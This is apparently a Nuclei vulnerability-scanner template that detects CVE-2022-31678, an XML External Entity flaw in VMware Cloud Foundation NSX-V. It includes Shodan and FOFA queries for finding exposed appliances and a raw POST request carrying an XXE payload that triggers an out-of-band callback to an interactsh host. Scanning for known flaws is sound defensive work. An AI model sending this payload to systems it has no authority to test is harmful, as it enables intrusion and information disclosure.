id: CVE-2022-31678

info:
  name: VMWare Cloud Foundation NSX-V - XML External Entity (XXE)
  author: daffainfo
  severity: critical
  description: |
    VMware Cloud Foundation (NSX-V) contains an XML External Entity (XXE) vulnerability. On VCF 3.x instances with NSX-V deployed, this may allow a user to exploit this issue, leading to a denial-of-service condition or unintended information disclosure.
  impact: |
    Attackers can cause a denial of service or access sensitive information by exploiting the XXE vulnerability.
  remediation: |
    Update to the latest version of VMware Cloud Foundation with the patched NSX-V component.
  reference:
    - https://srcincite.io/advisories/src-2022-0022/
    - https://www.vmware.com/security/advisories/VMSA-2022-0027.html
    - https://nvd.nist.gov/vuln/detail/cve-2022-31678
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
    cvss-score: 9.1
    cve-id: CVE-2022-31678
    cwe-id: CWE-611
    epss-score: 0.83926
    epss-percentile: 0.99321
    cpe: cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: vmware
    product: cloud_foundation
    shodan-query: title:"VMware Appliance Management"
    fofa-query: title="VMware Appliance Management"
  tags: cve,cve2022,vmware,nsx,xxe,vkev

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/login.jsp"

    matchers:
      - type: word
        part: body
        words:
          - "VMware Appliance Management"
        internal: true

  - raw:
      - |
        POST /api/3.0/services/auth/token HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <?xml version="1.0"?>
        <!DOCTYPE r [
        <!ENTITY xxe SYSTEM "http://{{interactsh-url}}">
        ]>
        <request>
          <username>&xxe;</username>
          <password>{{randstr}}</password>
        </request>

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: Java"

      - type: word
        part: body
        words:
          - "Bad Username or Credentials presented"

      - type: status
        status:
          - 403
# digest: 4a0a00473045022100cc2cbee0a1918dd2740eaefeba850f4045b356b00f72bc5a63d127842412384902202551996b0c9001d09cb2105d3e0b78369c53b2aa24024c2734bd5a190aa457ae:922c64590222798bb761d5b6d8e72950